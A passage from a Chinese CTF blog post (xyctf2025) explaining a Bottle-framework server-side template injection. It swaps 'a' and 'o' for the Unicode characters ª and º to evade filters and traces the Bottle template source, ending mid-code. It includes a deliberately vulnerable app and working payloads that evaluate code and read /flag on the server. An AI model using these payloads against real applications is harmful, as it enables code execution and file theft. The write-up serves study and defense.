<!DOCTYPE html>
<html lang="en">

<head>
    <meta charset="UTF-8">
<meta name="viewport"
      content="width=device-width, initial-scale=1.0, maximum-scale=1.0, minimum-scale=1.0">
<meta http-equiv="X-UA-Compatible" content="ie=edge">

    <meta name="author" content="Meteor_Kai">



    <meta name="description" content="Just Hack For Fun...">


    <meta name="keywords" content="Web exploits bring me great joy!">


<title>bottle框架斜体字引发的ssti模板注入 | Meteor_Kai</title>



    <link rel="icon" href="/favicon.ico">




    <!-- stylesheets list from _config.yml -->
    
    <link rel="stylesheet" href="/css/style.css">
    



    <!-- scripts list from _config.yml -->
    
    <script src="/js/script.js"></script>
    
    <script src="/js/tocbot.min.js"></script>
    



    
    
        <!-- MathJax配置，可通过单美元符号书写行内公式等 -->
<script type="text/x-mathjax-config">
    MathJax.Hub.Config({
    "HTML-CSS": {
        preferredFont: "TeX",
        availableFonts: ["STIX","TeX"],
        linebreaks: { automatic:true },
        EqnChunk: (MathJax.Hub.Browser.isMobile ? 10 : 50)
    },
    tex2jax: {
        inlineMath: [ ["$", "$"], ["\\(","\\)"] ],
        processEscapes: true,
        ignoreClass: "tex2jax_ignore|dno",
        skipTags: ['script', 'noscript', 'style', 'textarea', 'pre', 'code']
    },
    TeX: {
        equationNumbers: { autoNumber: "AMS" },
        noUndefined: { attributes: { mathcolor: "red", mathbackground: "#FFEEEE", mathsize: "90%" } },
        Macros: { href: "{}" }
    },
    messageStyle: "none"
    });
</script>
<!-- 给MathJax元素添加has-jax class -->
<script type="text/x-mathjax-config">
    MathJax.Hub.Queue(function() {
        var all = MathJax.Hub.getAllJax(), i;
        for(i=0; i < all.length; i += 1) {
            all[i].SourceElement().parentNode.className += ' has-jax';
        }
    });
</script>
<!-- 通过连接CDN加载MathJax的js代码 -->
<script type="text/javascript" async
        src="https://cdnjs.cloudflare.com/ajax/libs/mathjax/2.7.5/MathJax.js?config=TeX-MML-AM_CHTML">
</script>


    


<meta name="generator" content="Hexo 7.3.0"></head>

<body>
    <script>
        // this function is used to check current theme before page loaded.
        (() => {
            const pagebody = document.getElementsByTagName('body')[0]

            function setTheme(status) {

                if (status === 'dark') {
                    window.sessionStorage.theme = 'dark'
                    pagebody.classList.add('dark-theme');

                } else if (status === 'light') {
                    window.sessionStorage.theme = 'light'
                    pagebody.classList.remove('dark-theme');
                }
            };

            setTheme(window.sessionStorage.theme)
        })();
    </script>

    <div class="wrapper">
        <header>
    <nav class="navbar">
        <div class="container">
            <div class="navbar-header header-logo"><a href="/">Meteor_Kai&#39;s Blog</a></div>
            <div class="menu navbar-right">
                
                <a class="menu-item" href="/archives">Posts</a>
                
                <a class="menu-item" href="/categories">Categories</a>
                
                <a class="menu-item" href="/tags">Tags</a>
                
                <a class="menu-item" href="/about">About</a>
                
                <a class="menu-item" href="/links">links</a>
                
                
                <input id="switch_default" type="checkbox" class="switch_default">
                <label for="switch_default" class="toggleBtn"></label>
            </div>
        </div>
    </nav>

    
    <nav class="navbar-mobile" id="nav-mobile">
        <div class="container">
            <div class="navbar-header">
                <div>
                    <a href="/">Meteor_Kai&#39;s Blog</a><a id="mobile-toggle-theme">·&nbsp;Light</a>
                </div>
                <div class="menu-toggle" onclick="mobileBtn()">
                    <svg class="menu-icon" xmlns="http://www.w3.org/2000/svg" width="32" height="32" viewBox="0 0 24 24"><path fill="currentColor" d="M4.5 17.27q-.213 0-.356-.145T4 16.768t.144-.356t.356-.143h15q.213 0 .356.144q.144.144.144.357t-.144.356t-.356.143zm0-4.77q-.213 0-.356-.144T4 11.999t.144-.356t.356-.143h15q.213 0 .356.144t.144.357t-.144.356t-.356.143zm0-4.77q-.213 0-.356-.143Q4 7.443 4 7.23t.144-.356t.356-.143h15q.213 0 .356.144T20 7.23t-.144.356t-.356.144z"/></svg>
                    <svg class="close-icon" xmlns="http://www.w3.org/2000/svg" width="32" height="32" viewBox="0 0 24 24"><!-- Icon from Material Symbols Light by Google - https://github.com/google/material-design-icons/blob/master/LICENSE --><path fill="currentColor" d="m12 12.708l-5.246 5.246q-.14.14-.344.15t-.364-.15t-.16-.354t.16-.354L11.292 12L6.046 6.754q-.14-.14-.15-.344t.15-.364t.354-.16t.354.16L12 11.292l5.246-5.246q.14-.14.345-.15q.203-.01.363.15t.16.354t-.16.354L12.708 12l5.246 5.246q.14.14.15.345q.01.203-.15.363t-.354.16t-.354-.16z"/></svg>
                </div>
            </div>
            <div class="menu" id="mobile-menu">
                
                <a class="menu-item" href="/archives">Posts</a>
                
                <a class="menu-item" href="/categories">Categories</a>
                
                <a class="menu-item" href="/tags">Tags</a>
                
                <a class="menu-item" href="/about">About</a>
                
                <a class="menu-item" href="/links">links</a>
                
            </div>
        </div>
    </nav>

</header>
<script>
    var mobileBtn = function f() {
        var toggleMenu = document.getElementsByClassName("menu-toggle")[0];
        var mobileMenu = document.getElementById("mobile-menu");
        if (toggleMenu.classList.contains("active")) {
            toggleMenu.classList.remove("active")
            mobileMenu.classList.remove("active")
        } else {
            toggleMenu.classList.add("active")
            mobileMenu.classList.add("active")
        }
    }
</script>
            <div class="main">
                <div class="container">
    
    
        <div class="post-toc">
    <div class="tocbot-list">
    </div>
    <div class="tocbot-list-menu">
        <a class="tocbot-toc-expand" onclick="expand_toc()">Expand all</a>
        <a onclick="go_top()">Back to top</a>
        <a onclick="go_bottom()">Go to bottom</a>
    </div>
</div>

<script>
    var tocbot_timer;
    var DEPTH_MAX = 6; // 为 6 时展开所有
    var tocbot_default_config = {
        tocSelector: '.tocbot-list',
        contentSelector: '.post-content',
        headingSelector: 'h1, h2, h3, h4, h5',
        orderedList: false,
        scrollSmooth: true,
        onClick: extend_click,
    };

    function extend_click() {
        clearTimeout(tocbot_timer);
        tocbot_timer = setTimeout(function() {
            tocbot.refresh(obj_merge(tocbot_default_config, {
                hasInnerContainers: true
            }));
        }, 420); // 这个值是由 tocbot 源码里定义的 scrollSmoothDuration 得来的
    }

    document.ready(function() {
        tocbot.init(obj_merge(tocbot_default_config, {
            collapseDepth: 1
        }));
    });

    function expand_toc() {
        var b = document.querySelector('.tocbot-toc-expand');
        var expanded = b.getAttribute('data-expanded');
        expanded ? b.removeAttribute('data-expanded') : b.setAttribute('data-expanded', true);
        tocbot.refresh(obj_merge(tocbot_default_config, {
            collapseDepth: expanded ? 1 : DEPTH_MAX
        }));
        b.innerText = expanded ? 'Expand all' : 'Collapse all';
    }

    function go_top() {
        window.scrollTo(0, 0);
    }

    function go_bottom() {
        window.scrollTo(0, document.body.scrollHeight);
    }

    function obj_merge(target, source) {
        for (var item in source) {
            if (source.hasOwnProperty(item)) {
                target[item] = source[item];
            }
        }
        return target;
    }
</script>
    

    
    <article class="post-wrap">
        <header class="post-header">
            <h1 class="post-title">bottle框架斜体字引发的ssti模板注入</h1>
            
                <div class="post-meta">
                    
                        Author: <a itemprop="author" rel="author" href="/">Meteor_Kai</a>
                    

                    
                        <span class="post-time">
                        Date: <a href="#">April 8, 2025&nbsp;&nbsp;19:24:19</a>
                        </span>
                    
                    
                        <span class="post-category">
                    Category:
                            
                                <a href="/categories/Web%E5%AE%89%E5%85%A8/">Web安全</a>
                            
                        </span>
                    
                </div>
            
        </header>

        <div class="post-content">
            <h2 id="show"><a href="#show" class="headerlink" title="show"></a>show</h2><p>xyctf2025遇到了这个知识点</p>
<p>环境如下：</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">import</span> bottle</span><br><span class="line"><span class="meta">@bottle.route(<span class="params"><span class="string">&#x27;/&#x27;</span></span>)</span></span><br><span class="line"><span class="keyword">def</span> <span class="title function_">index</span>():</span><br><span class="line">    <span class="keyword">return</span> <span class="string">&#x27;Hello, World!&#x27;</span></span><br><span class="line"><span class="meta">@bottle.route(<span class="params"><span class="string">&#x27;/attack&#x27;</span></span>)</span></span><br><span class="line"><span class="keyword">def</span> <span class="title function_">attack</span>():</span><br><span class="line">    payload = bottle.request.query.get(<span class="string">&#x27;payload&#x27;</span>)</span><br><span class="line">    <span class="built_in">print</span>(payload)</span><br><span class="line">    <span class="keyword">try</span>:</span><br><span class="line">        <span class="keyword">return</span> bottle.template(<span class="string">&#x27;hello &#x27;</span>+payload)</span><br><span class="line">    <span class="keyword">except</span>:</span><br><span class="line">        bottle.abort(<span class="number">400</span>, <span class="string">&#x27;Invalid payload&#x27;</span>)</span><br><span class="line"><span class="keyword">if</span> __name__ == <span class="string">&#x27;__main__&#x27;</span>:</span><br><span class="line">    bottle.run(host=<span class="string">&#x27;0.0.0.0&#x27;</span>, port=<span class="number">5000</span>)</span><br><span class="line"></span><br></pre></td></tr></table></figure>

<p>目前发现的POC只能替换俩字符，分别是<code>o</code>，<code>a</code>，在bottle的SSTI里，他们可以被直接替换成<code>ª</code> (U+00AA)，<code>º</code> (U+00BA)进而绕过各种waf。</p>
<p>这里给出unicode字符表的网址：<a target="_blank" rel="noopener" href="https://symbl.cc/cn/unicode-table/#latin-1-supplement">https://symbl.cc/cn/unicode-table/#latin-1-supplement</a></p>
<hr>
<p><code>ª</code>的url编码是<code>%C2%AA</code>，若我们直接传入<code>http://127.0.0.1:5000/attack?payload=&#123;&#123;%C2%AAbs(-1)&#125;&#125;</code>，服务端回显如下：</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">&#123;&#123;Âªbs(-1)&#125;&#125;</span><br><span class="line">127.0.0.1 - - [08/Apr/2025 16:27:04] &quot;GET /attack?payload=&#123;&#123;%C2%AAbs(-1)&#125;&#125; HTTP/1.1&quot; 400 752</span><br></pre></td></tr></table></figure>

<p>那么我们去掉<code>%C2</code>，发现页面正常回显<code>hello 1</code></p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">127.0.0.1 - - [08/Apr/2025 16:28:01] &quot;GET /attack?payload=&#123;&#123;%AAbs(-1)&#125;&#125; HTTP/1.1&quot; 200 7</span><br><span class="line">&#123;&#123;ªbs(-1)&#125;&#125;</span><br></pre></td></tr></table></figure>

<hr>
<p>然后我们试试阳性序数指示符<code>º</code>。url编码是<code>%C2%BA</code>。若我们直接传入<code>http://192.168.79.128:5000/attack?payload=&#123;&#123;%C2%BApen(%27/flag%27).read()&#125;&#125;</code>，客户端报错，服务端回显如下：</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">&#123;&#123;Âºpen(&#x27;/flag&#x27;).read()&#125;&#125;</span><br><span class="line">192.168.79.1 - - [08/Apr/2025 16:40:48] &quot;GET /attack?payload=&#123;&#123;%C2%BApen(%27/flag%27).read()&#125;&#125; HTTP/1.1&quot; 400 768</span><br></pre></td></tr></table></figure>

<p>去掉<code>%C2</code>，发现ok啦。<code>http://192.168.79.128:5000/attack?payload=&#123;&#123;%BApen(%27/flag%27).read()&#125;&#125;</code></p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">&#123;&#123;ºpen(&#x27;/flag&#x27;).read()&#125;&#125;</span><br><span class="line">192.168.79.1 - - [08/Apr/2025 16:42:17] &quot;GET /attack?payload=&#123;&#123;%BApen(%27/flag%27).read()&#125;&#125; HTTP/1.1&quot; 200 30</span><br></pre></td></tr></table></figure>





<h2 id="原理"><a href="#原理" class="headerlink" title="原理"></a>原理</h2><p>我们深入代码看看，个人认为bottle源码看着还是很舒服的，因为只有一个文件。</p>
<p>我们跟进<code>bottle.template()</code>看看</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">def</span> <span class="title function_">template</span>(<span class="params">*args, **kwargs</span>):</span><br><span class="line">    <span class="string">&quot;&quot;&quot;</span></span><br><span class="line"><span class="string">    Get a rendered template as a string iterator.</span></span><br><span class="line"><span class="string">    You can use a name, a filename or a template string as first parameter.</span></span><br><span class="line"><span class="string">    Template rendering arguments can be passed as dictionaries</span></span><br><span class="line"><span class="string">    or directly (as keyword arguments).</span></span><br><span class="line"><span class="string">    &quot;&quot;&quot;</span></span><br><span class="line">    tpl = args[<span class="number">0</span>] <span class="keyword">if</span> args <span class="keyword">else</span> <span class="literal">None</span></span><br><span class="line">    <span class="keyword">for</span> dictarg <span class="keyword">in</span> args[<span class="number">1</span>:]:</span><br><span class="line">        kwargs.update(dictarg)</span><br><span class="line">    adapter = kwargs.pop(<span class="string">&#x27;template_adapter&#x27;</span>, SimpleTemplate)</span><br><span class="line">    lookup = kwargs.pop(<span class="string">&#x27;template_lookup&#x27;</span>, TEMPLATE_PATH)</span><br><span class="line">    tplid = (<span class="built_in">id</span>(lookup), tpl)</span><br><span class="line">    <span class="keyword">if</span> tplid <span class="keyword">not</span> <span class="keyword">in</span> TEMPLATES <span class="keyword">or</span> DEBUG:</span><br><span class="line">        settings = kwargs.pop(<span class="string">&#x27;template_settings&#x27;</span>, &#123;&#125;)</span><br><span class="line">        <span class="keyword">if</span> <span class="built_in">isinstance</span>(tpl, adapter):</span><br><span class="line">            TEMPLATES[tplid] = tpl</span><br><span class="line">            <span class="keyword">if</span> settings: TEMPLATES[tplid].prepare(**settings)</span><br><span class="line">        <span class="keyword">elif</span> <span class="string">&quot;\n&quot;</span> <span class="keyword">in</span> tpl <span class="keyword">or</span> <span class="string">&quot;&#123;&quot;</span> <span class="keyword">in</span> tpl <span class="keyword">or</span> <span class="string">&quot;%&quot;</span> <span class="keyword">in</span> tpl <span class="keyword">or</span> <span class="string">&#x27;$&#x27;</span> <span class="keyword">in</span> tpl:</span><br><span class="line">            TEMPLATES[tplid] = adapter(source=tpl, lookup=lookup, **settings)</span><br><span class="line">        <span class="keyword">else</span>:</span><br><span class="line">            TEMPLATES[tplid] = adapter(name=tpl, lookup=lookup, **settings)</span><br><span class="line">    <span class="keyword">if</span> <span class="keyword">not</span> TEMPLATES[tplid]:</span><br><span class="line">        abort(<span class="number">500</span>, <span class="string">&#x27;Template (%s) not found&#x27;</span> % tpl)</span><br><span class="line">    <span class="keyword">return</span> TEMPLATES[tplid].render(kwargs)</span><br></pre></td></tr></table></figure>

<p>这里主要就是指定模板引擎和模板文件的搜索路径。还有下面的模板缓存机制：</p>
<blockquote>
<ol>
<li><strong>缓存逻辑</strong>：如果模板未缓存或处于调试模式（<code>DEBUG=True</code>），则重新加载模板。<ul>
<li><strong>直接使用模板对象</strong>：如果 <code>tpl</code> 已经是适配器实例，直接缓存。</li>
<li><strong>模板字符串</strong>：如果包含换行符或模板语法符号（<code>&#123;</code>, <code>%</code>, <code>$</code>），视为模板字符串。</li>
<li><strong>模板文件</strong>：否则视为文件名，从 <code>lookup</code> 路径加载。</li>
</ul>
</li>
</ol>
</blockquote>
<p>识别出模板标识符后将其视为模板字符串，再交给<code>adapter</code>，也就是<code>SimpleTemplate</code>。使用<code>render()</code>作为入口函数。</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">def</span> <span class="title function_">render</span>(<span class="params">self, *args, **kwargs</span>):</span><br><span class="line">    <span class="string">&quot;&quot;&quot; Render the template using keyword arguments as local variables. &quot;&quot;&quot;</span></span><br><span class="line">    env = &#123;&#125;</span><br><span class="line">    stdout = []</span><br><span class="line">    <span class="keyword">for</span> dictarg <span class="keyword">in</span> args:</span><br><span class="line">        env.update(dictarg)</span><br><span class="line">    env.update(kwargs)</span><br><span class="line">    <span class="variable language_">self</span>.execute(stdout, env)</span><br><span class="line">    <span class="keyword">return</span> <span class="string">&#x27;&#x27;</span>.join(stdout)</span><br></pre></td></tr></table></figure>

<p>用 <code>env.update()</code> 把所有位置参数（<code>*args</code>）合并进 <code>env</code> 中；把关键字参数（<code>**kwargs</code>）也加入到 <code>env</code> 中；最后调用当前类的<code>execute</code>方法。我们跟进看看：</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">def</span> <span class="title function_">execute</span>(<span class="params">self, _stdout, kwargs</span>):</span><br><span class="line">    env = <span class="variable language_">self</span>.defaults.copy()</span><br><span class="line">    env.update(kwargs)</span><br><span class="line">    env.update(&#123;</span><br><span class="line">        <span class="string">&#x27;_stdout&#x27;</span>: _stdout,</span><br><span class="line">        <span class="string">&#x27;_printlist&#x27;</span>: _stdout.extend,</span><br><span class="line">        <span class="string">&#x27;include&#x27;</span>: functools.partial(<span class="variable language_">self</span>._include, env),</span><br><span class="line">        <span class="string">&#x27;rebase&#x27;</span>: functools.partial(<span class="variable language_">self</span>._rebase, env),</span><br><span class="line">        <span class="string">&#x27;_rebase&#x27;</span>: <span class="literal">None</span>,</span><br><span class="line">        <span class="string">&#x27;_str&#x27;</span>: <span class="variable language_">self</span>._<span class="built_in">str</span>,</span><br><span class="line">        <span class="string">&#x27;_escape&#x27;</span>: <span class="variable language_">self</span>._escape,</span><br><span class="line">        <span class="string">&#x27;get&#x27;</span>: env.get,</span><br><span class="line">        <span class="string">&#x27;setdefault&#x27;</span>: env.setdefault,</span><br><span class="line">        <span class="string">&#x27;defined&#x27;</span>: env.__contains__</span><br><span class="line">    &#125;)</span><br><span class="line">    <span class="built_in">exec</span>(<span class="variable language_">self</span>.co, env)</span><br><span class="line">    <span class="keyword">if</span> env.get(<span class="string">&#x27;_rebase&#x27;</span>):</span><br><span class="line">        subtpl, rargs = env.pop(<span class="string">&#x27;_rebase&#x27;</span>)</span><br><span class="line">        rargs[<span class="string">&#x27;base&#x27;</span>] = <span class="string">&#x27;&#x27;</span>.join(_stdout)  <span class="comment">#copy stdout</span></span><br><span class="line">        <span class="keyword">del</span> _stdout[:]  <span class="comment"># clear stdout</span></span><br><span class="line">        <span class="keyword">return</span> <span class="variable language_">self</span>._include(env, subtpl, **rargs)</span><br><span class="line">    <span class="keyword">return</span> env</span><br></pre></td></tr></table></figure>

<p>可以看到在exec的全局变量里定义了一个<code>_escape</code>和<code>_printlist</code>函数。</p>
<p>模板代码的执行其实就是在<code> exec(self.co, env)</code>，我们跟进看看<code>self.co</code>（即要执行的代码）。</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">@cached_property</span></span><br><span class="line">    <span class="keyword">def</span> <span class="title function_">co</span>(<span class="params">self</span>):</span><br><span class="line">        <span class="keyword">return</span> <span class="built_in">compile</span>(<span class="variable language_">self</span>.code, <span class="variable language_">self</span>.filename <span class="keyword">or</span> <span class="string">&#x27;&lt;string&gt;&#x27;</span>, <span class="string">&#x27;exec&#x27;</span>)</span><br></pre></td></tr></table></figure>

<p>这个<code>@cached_property</code>可以理解为是一个优化机制，用来避免重复计算。</p>
<p>进行了一次compile（编译），我们直接跟进<code>self.code</code></p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">def</span> <span class="title function_">code</span>(<span class="params">self</span>):</span><br><span class="line">    source = <span class="variable language_">self</span>.source</span><br><span class="line">    <span class="keyword">if</span> <span class="keyword">not</span> source:</span><br><span class="line">        <span class="keyword">with</span> <span class="built_in">open</span>(<span class="variable language_">self</span>.filename, <span class="string">&#x27;rb&#x27;</span>) <span class="keyword">as</span> f:</span><br><span class="line">            source = f.read()</span><br><span class="line">    <span class="keyword">try</span>:</span><br><span class="line">        source, encoding = touni(source), <span class="string">&#x27;utf8&#x27;</span></span><br><span class="line">    <span class="keyword">except</span> UnicodeError:</span><br><span class="line">        <span class="keyword">raise</span> depr(<span class="number">0</span>, <span class="number">11</span>, <span class="string">&#x27;Unsupported template encodings.&#x27;</span>, <span class="string">&#x27;Use utf-8 for templates.&#x27;</span>)</span><br><span class="line">    parser = StplParser(source, encoding=encoding, syntax=<span class="variable language_">self</span>.syntax)</span><br><span class="line">    code = parser.translate()</span><br><span class="line">    <span class="variable language_">self</span>.encoding = parser.encoding</span><br><span class="line">    <span class="keyword">return</span> code</span><br></pre></td></tr></table></figure>

<p>我们在try里面，touni的下方加一个<code>print(source)</code></p>
<p>当我们传入以下参数的时候，我们看看服务端print</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">http://127.0.0.1:5000/attack?payload=&#123;&#123;hello%20world&#125;&#125;</span><br></pre></td></tr></table></figure>

<img src="/2025/04/08/bottle%E6%A1%86%E6%9E%B6%E6%96%9C%E4%BD%93%E5%AD%97%E5%BC%95%E5%8F%91%E7%9A%84ssti%E6%A8%A1%E6%9D%BF%E6%B3%A8%E5%85%A5/image-20250408172108822.png" class="" title="This is an example image">



<p>发现这里的source其实就是我们传入的参数。</p>
<p>跟进touni看看：</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">def</span> <span class="title function_">touni</span>(<span class="params">s, enc=<span class="string">&#x27;utf8&#x27;</span>, err=<span class="string">&#x27;strict&#x27;</span></span>):</span><br><span class="line">    <span class="keyword">if</span> <span class="built_in">isinstance</span>(s, <span class="built_in">bytes</span>):</span><br><span class="line">        <span class="keyword">return</span> s.decode(enc, err)</span><br><span class="line">    <span class="keyword">return</span> unicode(<span class="string">&quot;&quot;</span> <span class="keyword">if</span> s <span class="keyword">is</span> <span class="literal">None</span> <span class="keyword">else</span> s)</span><br></pre></td></tr></table></figure>

<p>如果是字节类型的，decode后return，否则return一个<code>unicode(&quot;&quot; if s is None else s)</code>，然后我们看看unicode的定义：</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">unicode = str</span><br></pre></td></tr></table></figure>

<p>unicode是一个str类，全体str！</p>
<p>然后我们再回到<code>code()</code>方法</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">parser = StplParser(source, encoding=encoding, syntax=<span class="variable language_">self</span>.syntax)</span><br><span class="line">code = parser.translate()</span><br></pre></td></tr></table></figure>

<p>跟进一下<code>StplParser</code>的<code>translete</code>方法。<code>StplParser</code> 类是用来解析和转换某种模板或源代码的。</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">def</span> <span class="title function_">translate</span>(<span class="params">self</span>):</span><br><span class="line">    <span class="keyword">if</span> <span class="variable language_">self</span>.offset: <span class="keyword">raise</span> RuntimeError(<span class="string">&#x27;Parser is a one time instance.&#x27;</span>)</span><br><span class="line">    <span class="keyword">while</span> <span class="literal">True</span>:</span><br><span class="line">        m = <span class="variable language_">self</span>.re_split.search(<span class="variable language_">self</span>.source, pos=<span class="variable language_">self</span>.offset)</span><br><span class="line">        <span class="keyword">if</span> m:</span><br><span class="line">            text = <span class="variable language_">self</span>.source[<span class="variable language_">self</span>.offset:m.start()]</span><br><span class="line">            <span class="variable language_">self</span>.text_buffer.append(text)</span><br><span class="line">            <span class="variable language_">self</span>.offset = m.end()</span><br><span class="line">            <span class="keyword">if</span> m.group(<span class="number">1</span>):  <span class="comment"># Escape syntax</span></span><br><span class="line">                line, sep, _ = <span class="variable language_">self</span>.source[<span class="variable language_">self</span>.offset:].partition(<span class="string">&#x27;\n&#x27;</span>)</span><br><span class="line">                <span class="variable language_">self</span>.text_buffer.append(<span class="variable language_">self</span>.source[m.start():m.start(<span class="number">1</span>)] +</span><br><span class="line">                                        m.group(<span class="number">2</span>) + line + sep)</span><br><span class="line">                <span class="variable language_">self</span>.offset += <span class="built_in">len</span>(line + sep)</span><br><span class="line">                <span class="keyword">continue</span></span><br><span class="line">            <span class="variable language_">self</span>.flush_text()</span><br><span class="line">            <span class="variable language_">self</span>.offset += <span class="variable language_">self</span>.read_code(<span class="variable language_">self</span>.source[<span class="variable language_">self</span>.offset:],</span><br><span class="line">                                          multiline=<span class="built_in">bool</span>(m.group(<span class="number">4</span>)))</span><br><span class="line">        <span class="keyword">else</span>:</span><br><span class="line">            <span class="keyword">break</span></span><br><span class="line">    <span class="variable language_">self</span>.text_buffer.append(<span class="variable language_">self</span>.source[<span class="variable language_">self</span>.offset:])</span><br><span class="line">    <span class="variable language_">self</span>.flush_text()</span><br><span class="line">    <span class="keyword">return</span> <span class="string">&#x27;&#x27;</span>.join(<span class="variable language_">self</span>.code_buffer)</span><br></pre></td></tr></table></figure>

<p>这段代码主要就是将模板&#x2F;自定义语法转换为可执行代码（如 Python）。</p>
<p>这里我们主要关注的是<code>self.flush_text()</code>，我们跟进一下。</p>
<ul>
<li><strong><code>flush_text()</code></strong>: 将 <code>text_buffer</code> 中的普通文本转换为目标代码（如 Python 的 <code>print()</code> 语句）。</li>
</ul>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">def</span> <span class="title function_">flush_text</span>(<span class="params">self</span>):</span><br><span class="line">    text = <span class="string">&#x27;&#x27;</span>.join(<span class="variable language_">self</span>.text_buffer)</span><br><span class="line">    <span class="keyword">del</span> <span class="variable language_">self</span>.text_buffer[:]</span><br><span class="line">    <span class="keyword">if</span> <span class="keyword">not</span> text: <span class="keyword">return</span></span><br><span class="line">    parts, pos, nl = [], <span class="number">0</span>, <span class="string">&#x27;\\\n&#x27;</span> + <span class="string">&#x27;  &#x27;</span> * <span class="variable language_">self</span>.indent</span><br><span class="line">    <span class="keyword">for</span> m <span class="keyword">in</span> <span class="variable language_">self</span>.re_inl.finditer(text):</span><br><span class="line">        prefix, pos = text[pos:m.start()], m.end()</span><br><span class="line">        <span class="keyword">if</span> prefix:</span><br><span class="line">            parts.append(nl.join(<span class="built_in">map</span>(<span class="built_in">repr</span>, prefix.splitlines(<span class="literal">True</span>))))</span><br><span class="line">        <span class="keyword">if</span> prefix.endswith(<span class="string">&#x27;\n&#x27;</span>): parts[-<span class="number">1</span>] += nl</span><br><span class="line">        parts.append(<span class="variable language_">self</span>.process_inline(m.group(<span class="number">1</span>).strip()))</span><br><span class="line">    <span class="keyword">if</span> pos &lt; <span class="built_in">len</span>(text):</span><br><span class="line">        prefix = text[pos:]</span><br><span class="line">        lines = prefix.splitlines(<span class="literal">True</span>)</span><br><span class="line">        <span class="keyword">if</span> lines[-<span class="number">1</span>].endswith(<span class="string">&#x27;\\\\\n&#x27;</span>): lines[-<span class="number">1</span>] = lines[-<span class="number">1</span>][:-<span class="number">3</span>]</span><br><span class="line">        <span class="keyword">elif</span> lines[-<span class="number">1</span>].endswith(<span class="string">&#x27;\\\\\r\n&#x27;</span>): lines[-<span class="number">1</span>] = lines[-<span class="number">1</span>][:-<span class="number">4</span>]</span><br><span class="line">        parts.append(nl.join(<span class="built_in">map</span>(<span class="built_in">repr</span>, lines)))</span><br><span class="line">    code = <span 